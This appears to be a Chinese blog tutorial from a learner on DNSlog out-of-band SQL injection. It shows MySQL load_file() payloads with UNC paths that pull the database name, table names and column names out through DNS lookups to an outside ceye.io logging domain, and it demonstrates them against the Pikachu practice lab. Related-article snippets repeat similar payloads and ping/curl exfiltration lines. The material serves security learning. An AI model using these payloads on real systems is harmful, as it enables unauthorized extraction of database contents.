SQL注入之DNSlog注入(DNS带外查询)

最新推荐文章于 2025-03-27 23:55:44 发布
最新推荐文章于 2025-03-27 23:55:44 发布
阅读量1k 收藏 17
点赞数 10
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_89233381/article/details/146266794
版权

DNSlog注入

声明:DNSlog注入也是针对不回显的情况

1.原理:

攻击主机通过注入一个A网站网址,让目标主机触发网址的访问,将敏感信息携带到请求数据中
A网站记录下本次请求,在日志中就能看到目标主机的相关敏感数据了

由上图再次详细介绍其注入过程:

①注入操作
攻击者从攻击主机采用DNSLog注入手段,向目标主机注入一个A网站网址。这个注入过程通常是无回显的,也就是说,攻击者不会直接看到注入操作反映的结果。
 ②触发访问
目标主机会因为某些原因(例如恶意脚本、漏洞利用等)触发对注入网址的访问。在访问过程中,目标主机的敏感信息会被携带到请求数据中。
③数据记录与获取
当目标主机访问注入的A网站网址时,A网站会记录下这次请求。由于A网站开启了日志记录功能,攻击者就可以在A网站的日志中查看到目标主机的敏感数据。

2.条件:


①需要mysq用户具备读文件的权限,因为要借助到mysq的load_file读取文件的函数,权限不够的话,不能调用这个函数。其实只要mysq中配置项中开启了这个secure_file_priv配置,就可以通过sq语句来执行文件读写操作。 
目标mysq数据库服务器能够访问外网
其实load_file(不仅能够加载本地文件,同时也能对诸如Itwww.jaden.com这样的URL发起请求。这样的url我们称之为UNC路径,简单了解即可。

就借助load_file函数能够访问某个网址的特性,来进行DNSlog注入

注入语句如下:
and select load_file('\\\\xxx.xxxx.xxx\\xx');#    注: xxx.xxxx.xxx\\xx是某个网址(前面是4个斜杠,后面是2个斜杠或者前面可以是2个斜杠,后面是1个斜杠均可!!!

3.涉及函数及可用网站:

 load_file 函数是MySQL数据库中的一个函数,用于读取文件内容

其基本语法是 load_file(file_path) ,其中 file_path 是要读取文件的路径

DNSlog注入可用网站:
http://ceye.io/ 
http://www.dnslog.cn/

4.实操演示:

在这里,我以所听课的老师的演示为例进行简要说明:

http://ceye.io/ 网站为例

先是在数据库中查询,如下图:

.9fqiop.ceye.io”是用DNSlog注入手段所运用该网站网址

该查询语句是要读取jaden这个文件,NULL表示空,无回显

然后我们进入该网站的日志记录(DNS Query)中,可以看到其相关信息!

下面例子也是如此,其进行数据库查询,拼接读取

然后我们依然可以看到相关信息,在这里是获取了数据库名pikachu 这个信息

然后我们在pikachu靶场上练习

Ⅰ.获取当前库名

获取当前库名(这是在数据库中进行DNSlog注入)
 
下面两个都可以:
select * from member where id=1 and (select load_file(concat('//',(select database()),'.9fqiop.ceye.io/abc')))
select * from member where id=1 and (select load_file(concat('//',(select database()),'.9fqiop.ceye.io/abc')))

在pikachu靶场中以数字型注入id=1为例:

然后抓包------放到Repeater中------修改信息为 id=1 and (select load_file(concat('//',(select database()),'.9fqiop.ceye.io/abc')))------重新发送------前端返回相关结果后,去网站日志记录中查看,即可看到此次查询涉及的敏感信息

如下:

查看日志记录,获取了数据库名为pikachu

Ⅱ.获取表名

id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database()) limit 0,1),'.9fqiop.ceye.io\abc'))

这里使用 information_schema 数据库来获取当前数据库中的表名。通过修改 limit 子句中的参数(eg:将0修改为1,获取第二个表名),可以逐个获取表名。

eg:

id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database()) limit 1,1),'.9fqiop.ceye.io\abc'))

注入过程及查看结果如下:

经查询,"httpinfo"为第一个表名

Ⅲ.获取字段名

id=1 and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='member' limit 0,1),'.9fqiop.ceye.io\abc')))

同样也是修改limit后面的数字,将member表的字段名一个一个的取出来,也可以将table_name='member'中的member修改为其他表名,获取其他表名的字段名!

过程与上述获取库名和表名一致,在这里不在演示,大家也可尝试一下!

以上为个人在学习时的总结,如有错误,欢迎大家前来评论指正哦!!!

若初&
关注
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 312
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
DNSlog注入
7Riven's blog
12-31 993
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
安全测试的辅助工具之DNSLog 平台
最新发布
西京刀客
03-27 584
DNSLog 是一种用于安全测试的辅助工具,主要用于检测 无回显漏洞(如 SSRF、Blind SQLi、XXE 等)。它的核心原理是通过 DNS 协议记录目标服务器发起的 DNS 查询请求,从而间接验证漏洞的存在。
DNSLOG 注入
qq_33441500的博客
10-21 775
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
SQL注入DNSLog注入
dragon的博客
02-21 3387
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog注入也可以使用BurpSuite同样可以实现相应功能。
WEB安全--SQL注入--DNSlog
m0_74800552的博客
03-17 549
因为一些字符不能直接回显在网页上,需要hex()转为十六进制。
SQL注入DNSlog方式
m0_57347472的博客
03-22 356
DNSlog注入也可以称之为dns查询Dns在域名解析时会在DNS服务器上留下域名和解析il的记录,可以在dns服务器上查询相应的dns解析记录,来获取大致原理。那么我们就可以通过只有的方式然后拼接数据库函数,通过DNSlog获得数据库的信息。http://ceye.io/ 知道创宇公司提供的。上图是创宇公司提供的的DNSlog服务器网址。修改limit的数字即可得到其他表名。DNSlog服务器无需自己搭建。此处的路径我们称之为UNC路径。
SQL注入DnsLog注入
qq_52310755的博客
03-22 2381
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
26-5 SQL 注入攻击 - 利用dnslog回回显信息范例
2301_76268112的博客
05-15 1112
别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。我先来介绍一下这些东西怎么用,文末抱走。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。最近我才对这些路线做了一下新的更新,知识体系更全面了。
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4455
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
dns注入
scu_hacker博客
12-20 3184
目录 前言 一、DNS注入是什么? 二、dnslog的常见平台 三、实战 1. 联合sql盲注 2.联合xss 3.命令执行 4.xxe和ssrf 总结 参考资料 前言 我们常见的sql注入、xss、xxe、ssrf等web漏洞都会存在无回显的情况,为了更方便的获取到查询的内容,因此有了DNS注入。 一、DNS注入是什么? DNS即域名解析协议,用于ip和域名之间的相互解析,而dnslog就是记录了你对此域名或者...
dnslog注入
qq_40039615的博客
06-11 234
首先 ceye是一个网站 不是一个应用程序 http://ceye.io 这个是他的网址 操作: ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法:Loadfile 函数只能在windows操作系统执行,所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.
DNSLog注入
2302_81322786的博客
10-16 215
首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1765
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
dnslogsql注入
weixin_44894463的博客
07-09 285
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
sql注入dnslog
09-11
很抱歉,我不能提供关于SQL注入DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。如果你担心你的应用程序存在SQL注入漏洞,请立即与相关安全团队或专业人员联系以修复该问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值